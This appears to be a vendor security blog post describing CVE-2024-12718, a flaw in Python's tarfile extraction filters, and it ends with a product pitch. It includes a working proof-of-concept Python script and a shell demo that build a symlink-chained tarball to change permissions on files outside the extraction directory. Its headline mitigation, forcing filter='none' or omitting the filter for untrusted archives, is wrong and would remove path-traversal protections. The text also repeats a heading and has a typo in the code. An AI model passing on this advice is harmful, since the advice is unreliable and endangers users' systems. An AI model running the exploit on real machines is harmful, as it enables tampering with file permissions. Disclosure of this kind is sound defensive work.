CVE-2024-12718: Path Escape via Python’s tarfile Extraction Filters

A newly disclosed vulnerability in Python’s standard library, CVE-2024-12718, allows attackers to modify file metadata or file permissions outside the intended extraction directory. This issue affects systems running Python 3.12 and above when using tarfile.extract() or tarfile.extractall() with the filter parameter set to “data” or “tar”.

Though the vulnerability does not allow direct code execution, it originally received a CVSS score of 10.0 (Critical) before being downgraded to a Medium, due to its potential to break environment isolation, tamper with sensitive files, and aid in privilege escalation.

If you process untrusted tarballs in Python, pin filter="none" (or just drop the parameter), patch as soon as releases land, and monitor for suspicious utime/chmod syscalls.

Technical Breakdown

Vulnerability Details

The issue arises from the new filter parameter introduced in Python 3.12 to improve security during tar archive extraction. When used incorrectly, this filter fails to fully prevent manipulation of file metadata on targets outside the specified extraction directory.

Affected Configurations

• Python 3.12 and later.
  
• Use of tarfile.extract() or extractall() with filter="data" or filter=”tar”.
  
• Python 3.14 and later are at higher risk, as filter="data" is the default behavior.

Vulnerability Details

The issue arises from improper filtering of file metadata when extracting archives with filter="data" or filter="tar". This lets malicious tarballs:

• With filter="data": Modify timestamps (mtime) of files outside the extraction directory.
  
• With filter="tar": Apply chmod changes to files outside the extraction directory.
  

These bypass the intended directory sandbox and affect unrelated or sensitive files on the system.

Potential Exploit

While the vulnerability doesn’t directly allow code execution, it breaks directory confinement, leading to:

• Privilege escalation: Attacker changes file permissions on sensitive files like /etc/shadow or SSH keys if the extracting process runs as root.
  
• Sandbox escape: Many systems rely on extraction directories for isolation, this breaks that.
  
• Tampering and evasion: By changing file timestamps, attackers can obscure logs or mislead incident response.
  
• Trivial exploitation: Crafting a malicious tarball is simple and doesn’t require special tools.
  

Exploit Example

This exploit was shown in this thread, Here’s a simplified demonstration of what a malicious tarball might do:

# Attacker’s workspace: malicious_tar.py

#!/usr/bin/python3

import argparse
import os
import tarfile

ap = arparse = argparse.ArgumentParser()
ap.add_argument('tarpath', metavar='TARBALL')
ap.add_argument('target', metavar='TARGET')
opts = ap.parse_args()
target = os.path.abspath(opts.target)

with tarfile.open(opts.tarpath, 'w') as tar:

    def addmemb(name, **kwargs):
        memb = tarfile.TarInfo(name)
        for k, v in kwargs.items():
            getattr(memb, k)
            setattr(memb, k, v)
        tar.addfile(memb)

    # lrw-r--r-- pwn -> .
    addmemb('pwn', type=tarfile.SYMTYPE, linkname='.')
    # "pwn" is a very innocent symlink.

    # drwxrwxrwx pwn/
    addmemb('pwn', type=tarfile.DIRTYPE, mode=0o777)
    # But now "pwn" is also a directory, so it's scheduled to have its
    # metadata updated later.

    # lrw-r--r-- pwn -> x/x/x/x/⋯⋯⋯/x/../../../../⋯⋯⋯/../TARGET
    addmemb('pwn', type=tarfile.SYMTYPE, linkname=('x/' * 99 + '../' * 99 + target))
    # Oops, "pwn" is not so innocent any more.
    # But technically it's still pointing inside the dest dir,
    # so it doesn't upset the "data" filter.

    # lrw-r--r-- x/x/x/x/⋯⋯⋯/x -> ../../../⋯⋯⋯/..
    addmemb(('x/' * 99), type=tarfile.SYMTYPE, linkname=('../' * 98))
    # The newly created symlink symlink points to the dest dir,
    # so it's OK for the "data" filter.
    # But now "pwn" points to the target (outside the dest dir).

# Attacker’s workspace: run.sh

target=$(mktemp)
./malicious_tar.py mal.tar $target
ls -l $target
python3 -m tarfile --filter=tar -e mal.tar $(mktemp -d)
ls -l $target

After this runs, the target file may now have world-readable permissions.

If a victim extracts this tar archive in their workspace, an attacker could manipulate the permissions of a specific file on the victim’s system.

Recommendations

Mitigation Steps

• Avoid extracting untrusted tarballs entirely.
• Do not pass filter="tar" or filter="data" for untrusted archives. If you must unpack, force filter="none" and run in a dedicated, non-privileged container/VM.
  

Patch Status

There is no official patch as of June 2025, but users should:

• Watch for updates from the Python Software Foundation.
• Review archive handling workflows in CI/CD, web apps, and internal tooling.

How Upwind Protects Against CVE-2024-12718 and Similar Threats

Upwind helps you stay protected against file-based vulnerabilities like CVE-2024-12718 with a combination of visibility and real-time detection:

• SBOM Explorer Instantly see all software packages and their versions across your environments to identify systems running vulnerable Python versions (3.12+).
  
• Runtime Threat Detection: Detect unusual file activity and get real-time alerts.

• Faster Response, Less Noise: Focus on real exploitation attempts by correlating package exposure with observed runtime behavior.
  

With Upwind, your team can move from vulnerability awareness to actionable defense. To learn more about how Upwind protects you from CVE-2024-12718, schedule a demo.